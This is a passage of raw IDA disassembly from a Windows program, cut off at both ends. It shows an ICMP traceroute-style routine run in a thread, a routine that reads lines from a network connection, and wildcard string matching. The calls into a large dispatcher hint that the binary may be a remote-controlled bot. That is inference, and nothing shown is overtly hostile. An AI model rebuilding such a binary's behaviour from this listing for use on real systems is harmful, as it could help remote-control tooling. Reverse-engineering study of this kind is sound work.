var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = byte ptr -2B0h
var_10D = byte ptr -10Dh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2F0h
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, byte_41E310
test eax, eax
jnz short loc_409E6D
push offset aIcmp_dll ; "ICMP.DLL"
call ds:dword_417054 ; LoadLibraryA
mov dword_41E300, eax
cmp dword_41E300, 0
jnz short loc_409E24
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E24: ; CODE XREF: sub_409DD0+4B�j
push offset aIcmpcreatefile ; "IcmpCreateFile"
push dword_41E300
call ds:dword_417058 ; GetProcAddress
mov dword_41E2FC, eax
push offset aIcmpsendecho ; "IcmpSendEcho"
push dword_41E300
call ds:dword_417058 ; GetProcAddress
mov dword_41E308, eax
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push dword_41E300
call ds:dword_417058 ; GetProcAddress
mov dword_41E304, eax
mov byte_41E310, 1
loc_409E6D: ; CODE XREF: sub_409DD0+32�j
cmp dword_41E2FC, 0
jnz short loc_409E7D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E7D: ; CODE XREF: sub_409DD0+A4�j
cmp dword_41E308, 0
jnz short loc_409E8D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E8D: ; CODE XREF: sub_409DD0+B4�j
cmp dword_41E304, 0
jnz short loc_409E9D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E9D: ; CODE XREF: sub_409DD0+C4�j
lea eax, [ebp+var_10D]
mov [ebp+var_2B8], eax
push [ebp+var_2B8]
call ds:dword_417244 ; inet_addr
mov [ebp+var_2BC], eax
cmp [ebp+var_2BC], 0FFFFFFFFh
jnz short loc_409F18
push [ebp+var_2B8]
call ds:dword_41723C ; gethostbyname
mov [ebp+var_2C0], eax
cmp [ebp+var_2C0], 0
jz short loc_409F06
mov eax, [ebp+var_2C0]
movsx eax, word ptr [eax+0Ah]
push eax
mov eax, [ebp+var_2C0]
mov eax, [eax+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_409F18
; ---------------------------------------------------------------------------
loc_409F06: ; CODE XREF: sub_409DD0+10D�j
push offset aCouldNotResolv ; "Could not resolve name"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409F18: ; CODE XREF: sub_409DD0+F2�j
; sub_409DD0+134�j
and [ebp+var_4], 0
mov byte ptr [ebp+var_2B4], 1
jmp short loc_409F33
; ---------------------------------------------------------------------------
loc_409F25: ; CODE XREF: sub_409DD0:loc_40A19C�j
mov al, byte ptr [ebp+var_2B4]
add al, 1
mov byte ptr [ebp+var_2B4], al
loc_409F33: ; CODE XREF: sub_409DD0+153�j
movzx eax, byte ptr [ebp+var_2B4]
movzx ecx, [ebp+var_D]
cmp eax, ecx
jg loc_40A1A1
cmp [ebp+var_4], 0
jnz loc_40A1A1
and [ebp+var_2EC], 0
or [ebp+var_2E4], 0FFFFFFFFh
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
and [ebp+var_2D0], 0
and [ebp+var_2C8], 0
and [ebp+var_2CC], 0
and [ebp+var_2D8], 0
and [ebp+var_2D4], 0
jmp short loc_409F9E
; ---------------------------------------------------------------------------
loc_409F91: ; CODE XREF: sub_409DD0:loc_40A04E�j
mov eax, [ebp+var_2D4]
inc eax
mov [ebp+var_2D4], eax
loc_409F9E: ; CODE XREF: sub_409DD0+1BF�j
mov eax, [ebp+var_2D4]
cmp eax, [ebp+var_8]
jnb loc_40A053
cmp [ebp+var_2D8], 0
jnz loc_40A053
push 20h
push [ebp+var_C]
push [ebp+var_2B4]
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2BC]
call sub_409CB1
add esp, 14h
test eax, eax
jz short loc_40A047
cmp [ebp+var_2CC], 0
jnz short loc_40A02F
mov eax, [ebp+var_2D0]
add eax, [ebp+var_2C4]
mov [ebp+var_2D0], eax
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2E4]
jnb short loc_40A013
mov eax, [ebp+var_2C4]
mov [ebp+var_2E4], eax
loc_40A013: ; CODE XREF: sub_409DD0+235�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2DC]
jbe short loc_40A02D
mov eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
loc_40A02D: ; CODE XREF: sub_409DD0+24F�j
jmp short loc_40A045
; ---------------------------------------------------------------------------
loc_40A02F: ; CODE XREF: sub_409DD0+215�j
mov eax, [ebp+var_2CC]
mov [ebp+var_2EC], eax
mov [ebp+var_2D8], 1
loc_40A045: ; CODE XREF: sub_409DD0:loc_40A02D�j
jmp short loc_40A04E
; ---------------------------------------------------------------------------
loc_40A047: ; CODE XREF: sub_409DD0+20C�j
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_40A04E: ; CODE XREF: sub_409DD0:loc_40A045�j
jmp loc_409F91
; ---------------------------------------------------------------------------
loc_40A053: ; CODE XREF: sub_409DD0+1D7�j
; sub_409DD0+1E4�j
mov eax, [ebp+var_2C8]
mov [ebp+var_2E8], eax
cmp [ebp+var_2EC], 0
jnz short loc_40A07B
mov eax, [ebp+var_2D0]
xor edx, edx
div [ebp+var_8]
mov [ebp+var_2E0], eax
jmp short loc_40A090
; ---------------------------------------------------------------------------
loc_40A07B: ; CODE XREF: sub_409DD0+296�j
and [ebp+var_2E4], 0
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
loc_40A090: ; CODE XREF: sub_409DD0+2A9�j
cmp [ebp+var_2EC], 0
jnz loc_40A165
push 2
push 4
lea eax, [ebp+var_2E8]
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp+var_2F0], eax
cmp [ebp+var_2F0], 0
jz short loc_40A115
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
mov eax, [ebp+var_2F0]
push dword ptr [eax]
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419594
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 2Ch
jmp short loc_40A163
; ---------------------------------------------------------------------------
loc_40A115: ; CODE XREF: sub_409DD0+2EB�j
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419568
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 28h
loc_40A163: ; CODE XREF: sub_409DD0+343�j
jmp short loc_40A187
; ---------------------------------------------------------------------------
loc_40A165: ; CODE XREF: sub_409DD0+2C7�j
push [ebp+var_2EC]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419540
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 10h
loc_40A187: ; CODE XREF: sub_409DD0:loc_40A163�j
mov eax, [ebp+var_2BC]
cmp eax, [ebp+var_2E8]
jnz short loc_40A19C
mov [ebp+var_4], 1
loc_40A19C: ; CODE XREF: sub_409DD0+3C3�j
jmp loc_409F25
; ---------------------------------------------------------------------------
loc_40A1A1: ; CODE XREF: sub_409DD0+170�j
; sub_409DD0+17A�j
xor eax, eax
locret_40A1A3: ; CODE XREF: sub_409DD0+4F�j
; sub_409DD0+A8�j ...
leave
retn 4
sub_409DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A1A7 proc near ; CODE XREF: sub_40A9CF+FAE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
cmp [ebp+arg_4], 0
jnz short loc_40A1C7
push offset unk_419618
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1C7: ; CODE XREF: sub_40A1A7+A�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A1E0
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1E0: ; CODE XREF: sub_40A1A7+32�j
push 1A3h
push [ebp+arg_0]
push [ebp+var_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A3h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
cmp eax, 0FFh
jg short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_40A231
; ---------------------------------------------------------------------------
loc_40A22A: ; CODE XREF: sub_40A1A7+63�j
; sub_40A1A7+73�j
mov [ebp+var_10], 1Eh
loc_40A231: ; CODE XREF: sub_40A1A7+81�j
mov eax, [ebp+var_4]
mov cl, byte ptr [ebp+var_10]
mov [eax+2A3h], cl
cmp [ebp+arg_C], 0
jz short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
cmp eax, 927C0h
jg short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
jmp short loc_40A268
; ---------------------------------------------------------------------------
loc_40A261: ; CODE XREF: sub_40A1A7+9A�j
; sub_40A1A7+AA�j
mov [ebp+var_14], 7530h
loc_40A268: ; CODE XREF: sub_40A1A7+B8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_14]
mov [eax+2A4h], ecx
cmp [ebp+arg_10], 0
jz short loc_40A288
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_18], eax
jmp short loc_40A28F
; ---------------------------------------------------------------------------
loc_40A288: ; CODE XREF: sub_40A1A7+D1�j
mov [ebp+var_18], 3
loc_40A28F: ; CODE XREF: sub_40A1A7+DF�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_18]
mov [eax+2A8h], ecx
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_4]
push offset sub_409DD0
push 0
push 0
call ds:dword_4170B4 ; CreateThread
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A2C7
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
jmp short locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A2C7: ; CODE XREF: sub_40A1A7+113�j
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40A2D0: ; CODE XREF: sub_40A1A7+1B�j
; sub_40A1A7+34�j ...
leave
retn
sub_40A1A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A2D2 proc near ; CODE XREF: sub_40A4A4+30�p
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1114 = byte ptr -1114h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 111Ch
call sub_416BC0
mov eax, [ebp+arg_0]
add eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 104h
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset dword_41966C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
add esp, 14h
push 2710h
push 0
push offset dword_419668
mov eax, [ebp+arg_0]
add eax, 104h
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A339
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A339: ; CODE XREF: sub_40A2D2+5E�j
mov eax, [ebp+arg_0]
add eax, 4
push eax
push offset dword_419660
lea eax, [ebp+var_114]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_8]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A38F
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A38F: ; CODE XREF: sub_40A2D2+AB�j
push 1000h
lea eax, [ebp+var_1114]
push eax
push [ebp+var_8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_40A3B5
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_40A3C5
loc_40A3B5: ; CODE XREF: sub_40A2D2+DB�j
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A3C5: ; CODE XREF: sub_40A2D2+E1�j
lea eax, [ebp+var_1114]
mov [ebp+var_10], eax
loc_40A3CE: ; CODE XREF: sub_40A2D2:loc_40A492�j
mov eax, [ebp+var_10]
mov [ebp+var_111C], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A3E9
jmp loc_40A497
; ---------------------------------------------------------------------------
loc_40A3E9: ; CODE XREF: sub_40A2D2+110�j
push [ebp+var_111C]
call sub_407B5E
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40A41B
push offset dword_418F4C
push [ebp+var_111C]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40A442
loc_40A41B: ; CODE XREF: sub_40A2D2+131�j
mov eax, [ebp+var_111C]
lea ecx, [ebp+var_1114]
cmp eax, ecx
jz short loc_40A440
push offset dword_41965C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A440: ; CODE XREF: sub_40A2D2+157�j
jmp short loc_40A458
; ---------------------------------------------------------------------------
loc_40A442: ; CODE XREF: sub_40A2D2+147�j
push [ebp+var_111C]
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A458: ; CODE XREF: sub_40A2D2:loc_40A440�j
push 3E8h
call ds:dword_41709C ; Sleep
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+4]
mov [ebp+var_1118], eax
push offset dword_41E2D8
call sub_409C7A
pop ecx
cmp [ebp+var_1118], 0
jz short loc_40A492
jmp short loc_40A497
; ---------------------------------------------------------------------------
loc_40A492: ; CODE XREF: sub_40A2D2+1BC�j
jmp loc_40A3CE
; ---------------------------------------------------------------------------
loc_40A497: ; CODE XREF: sub_40A2D2+112�j
; sub_40A2D2+1BE�j
push [ebp+var_8]
call sub_40538D
pop ecx
mov al, 1
locret_40A4A2: ; CODE XREF: sub_40A2D2+62�j
; sub_40A2D2+B8�j ...
leave
retn
sub_40A2D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4A4 proc near ; DATA XREF: sub_40A50E+A1�o
var_3A8 = dword ptr -3A8h
var_2A4 = byte ptr -2A4h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3A8h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_3A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_3A8]
push eax
call sub_40A2D2
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40A4FC
lea eax, [ebp+var_2A4]
push eax
push offset dword_419698
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40A4FC: ; CODE XREF: sub_40A4A4+3B�j
push [ebp+var_3A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40A4A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A50E proc near ; CODE XREF: sub_40A9CF+FE3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_40A51D
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A51D: ; CODE XREF: sub_40A50E+8�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A536
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A536: ; CODE XREF: sub_40A50E+21�j
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A562
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40A586
; ---------------------------------------------------------------------------
loc_40A562: ; CODE XREF: sub_40A50E+3D�j
push offset dword_4196D4
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_4105FB
pop ecx
loc_40A586: ; CODE XREF: sub_40A50E+52�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4196B4
push 0
push [ebp+var_4]
push offset sub_40A4A4
call sub_4095A4
add esp, 18h
locret_40A5BC: ; CODE XREF: sub_40A50E+A�j
; sub_40A50E+23�j
leave
retn
sub_40A50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5BE proc near ; CODE XREF: sub_40A5BE+32�p
; sub_40A5BE+70�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A603
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A5DD
mov al, 1
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5DD: ; CODE XREF: sub_40A5BE+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A5FC
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5FC: ; CODE XREF: sub_40A5BE+28�j
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A603: ; CODE XREF: sub_40A5BE+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A614
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A614: ; CODE XREF: sub_40A5BE+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A63A
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A63A: ; CODE XREF: sub_40A5BE+64�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A65B
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A65B: ; CODE XREF: sub_40A5BE+85�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69E
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A67C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A687
loc_40A67C: ; CODE XREF: sub_40A5BE+B1�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69A
loc_40A687: ; CODE XREF: sub_40A5BE+BC�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69A: ; CODE XREF: sub_40A5BE+C7�j
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69E: ; CODE XREF: sub_40A5BE+A6�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A6E7
and [ebp+var_4], 0
jmp short loc_40A6B6
; ---------------------------------------------------------------------------
loc_40A6AF: ; CODE XREF: sub_40A5BE:loc_40A6E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A6B6: ; CODE XREF: sub_40A5BE+EF�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A6D4
mov al, 1
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6D4: ; CODE XREF: sub_40A5BE+110�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A6E5
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6E5: ; CODE XREF: sub_40A5BE+121�j
jmp short loc_40A6AF
; ---------------------------------------------------------------------------
loc_40A6E7: ; CODE XREF: sub_40A5BE+E9�j
xor al, al
locret_40A6E9: ; CODE XREF: sub_40A5BE+1A�j
; sub_40A5BE+39�j ...
leave
retn
sub_40A5BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6EB proc near ; CODE XREF: sub_4097A7+10A�p
; sub_4098F3+155�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A730
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A70A
mov al, 1
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A70A: ; CODE XREF: sub_40A6EB+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A729
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A729: ; CODE XREF: sub_40A6EB+28�j
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A730: ; CODE XREF: sub_40A6EB+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A741
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A741: ; CODE XREF: sub_40A6EB+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A767
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A767: ; CODE XREF: sub_40A6EB+64�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 41h
jl short loc_40A77D
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 5Ah
jle short loc_40A793
loc_40A77D: ; CODE XREF: sub_40A6EB+85�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 61h
jl short loc_40A7BC
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 7Ah
jg short loc_40A7BC
loc_40A793: ; CODE XREF: sub_40A6EB+90�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
xor eax, 20h
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A7BC
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7BC: ; CODE XREF: sub_40A6EB+9B�j
; sub_40A6EB+A6�j ...
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A7DD
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7DD: ; CODE XREF: sub_40A6EB+DA�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A820
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A7FE
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A809
loc_40A7FE: ; CODE XREF: sub_40A6EB+106�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A81C
loc_40A809: ; CODE XREF: sub_40A6EB+111�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A81C: ; CODE XREF: sub_40A6EB+11C�j
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A820: ; CODE XREF: sub_40A6EB+FB�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A869
and [ebp+var_4], 0
jmp short loc_40A838
; ---------------------------------------------------------------------------
loc_40A831: ; CODE XREF: sub_40A6EB:loc_40A867�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A838: ; CODE XREF: sub_40A6EB+144�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A856
mov al, 1
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A856: ; CODE XREF: sub_40A6EB+165�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A867
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A6EB+176�j
jmp short loc_40A831
; ---------------------------------------------------------------------------
loc_40A869: ; CODE XREF: sub_40A6EB+13E�j
xor al, al
locret_40A86B: ; CODE XREF: sub_40A6EB+1A�j
; sub_40A6EB+39�j ...
leave
retn
sub_40A6EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A86D proc near ; CODE XREF: sub_40A8AD+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], 1
cmp [ebp+arg_4], 0
jnz short loc_40A884
push 1
pop eax
jmp short locret_40A8AB
; ---------------------------------------------------------------------------
loc_40A884: ; CODE XREF: sub_40A86D+10�j
mov [ebp+var_8], 1
jmp short loc_40A894
; ---------------------------------------------------------------------------
loc_40A88D: ; CODE XREF: sub_40A86D+39�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40A894: ; CODE XREF: sub_40A86D+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jg short loc_40A8A8
mov eax, [ebp+var_4]
imul eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_40A88D
